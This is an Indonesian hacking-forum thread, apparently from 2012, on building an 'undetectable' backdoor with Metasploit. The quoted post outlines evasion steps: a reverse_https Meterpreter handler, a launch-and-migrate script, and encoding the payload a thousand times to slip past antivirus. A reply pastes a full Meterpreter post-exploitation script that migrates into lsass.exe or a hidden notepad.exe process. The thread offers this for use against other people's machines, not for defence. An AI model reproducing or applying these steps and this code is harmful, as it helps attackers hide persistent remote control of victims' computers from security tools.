> > > > >


Membuat backdoor undetectable di Metasploit Framework
Viva La Vida Offline
TM
2 - 4
#5
Smile  10-21-2012, 08:17 PM
(10-19-2012, 08:33 AM)mahong Wrote: oke langsung aj. di pagi yang sebohay ini saya akan melakukan enkripsi backdoors dengan menggunakan metasploit framework di Backtrack 5!


Pertama, install ni:
" apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils "

jalanin metasploit framework console, gunakan exploit/multi/handler method, dan set payload windows/meterpreter/reverse_https.Ini merupakan langkah untuk menggunakan script ‘launch_and_migrate.rb’, jadi kita bisa pidah ke proses berikutnya setelah kita dapat peluang. Kita encoded backdoornya 1000 kali sampai tidak stabil.

untuk sciptnya bisa PM ke saya dengan mencantumkan email anda..

semoga dapat membantu...

thxs...
bener nggak bang ?
Code:
# $Id$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#

spawn = false
target = nil

opts = Rex::Parser::Arguments.new(
        "-h" => [ false,"Help menu." ],
        "-f" => [ false, "Launch a process and migrate into the new process"]
)
opts.parse(args) { |opt, idx, val|
        case opt
        when "-f"
                spawn = true
        when "-h"
                print_line("")
                print_line("USAGE:   run migrate [process name]")
                print_line("EXAMPLE: run migrate explorer.exe")
                print_line(opts.usage)
                raise Rex::Script::Completed
        else
                target = val
        end
}



if client.platform =~ /win32|win64/
        server = client.sys.process.open

        print_status("Current server process: #{server.name} (#{server.pid})")

        target_pid = nil

        if ! spawn
                # Get the target process name
                target ||= "lsass.exe"
                print_status("Migrating to #{target}...")

                # Get the target process pid
                target_pid = client.sys.process[target]

                if not target_pid
                        print_error("Could not access the target process")
                        print_status("Spawning a notepad.exe host process...")
                        note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
                        target_pid = note.pid
                end
        else
                target ||= "notepad.exe"
                print_status("Spawning a #{target} host process...")
                newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
                target_pid = newproc.pid
                if not target_pid
                        print_error("Could not create a process around #{target}")
                        raise Rex::Script::Completed
                end
        end

        # Do the migration
        print_status("Migrating into process ID #{target_pid}")
        client.core.migrate(target_pid)
        server = client.sys.process.open
        print_status("New server process: #{server.name} (#{server.pid})")

else
        print_error("This version of Meterpreter is not supported with this Script!")
        raise Rex::Script::Completed
end
SENJA INI
 
Find
Reply


Messages In This Thread
RE: Membuat backdoor undetectable di Metasploit Framework - by Viva La Vida - 10-21-2012, 08:17 PM




Users browsing this thread: 1 Guest(s)